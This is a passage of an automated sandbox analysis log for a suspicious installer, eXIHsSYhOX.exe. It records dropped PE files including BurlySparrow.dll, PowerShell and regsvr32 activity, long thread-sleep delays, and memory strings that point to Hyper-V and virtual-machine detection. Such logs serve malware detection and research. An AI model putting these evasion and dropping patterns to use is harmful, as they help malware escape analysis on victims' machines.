Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7781
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1949
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2824
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6444
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3319
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FHHU1.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-SF7GG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-L5KBT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\BurlySparrow.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation, DecisionNodes graph_7-53639
Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 8.9 %
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7820 Thread sleep count: 38 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7820 Thread sleep time: -38000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172 Thread sleep count: 7781 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep count: 1949 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7564 Thread sleep count: 6844 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572 Thread sleep count: 2824 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5320 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep count: 6444 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884 Thread sleep count: 3319 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7976 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_6C85BC60 GetSystemInfo,memcpy,memcpy,7_2_6C85BC60
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917306069.00000000027DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2020697105.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1947196504.00000000047A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service?
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processorsi
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisors
Source: powershell.exe, 00000008.00000002.1808266215.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Vet-RunspaceDebug", "Wait-MSFT_NetEventVmNetworkAdatper.format.ps1xmlsh",
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partition\E
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root PartitionE
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor)
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service(
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition:
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service4
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V mqabcqtdeleiepv Bus PipesU
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000007.00000002.2917797838.0000000004238000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual ProcessorF
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor\v
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition
Source: powershell.exe, 00000008.00000002.1808266215.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FeSource", "Set-TraceSourcMSFT_NetEventVmNetworkAdatper.cdxmle",
Source: regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2025223425.0000000002C8B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917306069.00000000027DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2020697105.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1947196504.00000000047A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917306069.00000000027DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2020697105.00000000047C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipess
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processorh]
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2025223425.0000000002C8B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processori
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorl
Source: powershell.exe, 00000011.00000002.2009636665.0000000007862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorll
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mqabcqtdeleiepv Bus Pipes'f
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus PipesPM
Source: regsvr32.exe, 00000007.00000003.1744337012.0000000004177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switche
Source: regsvr32.exe, 0000000E.00000003.1916940382.0000000002D1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1917236724.0000000002D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated 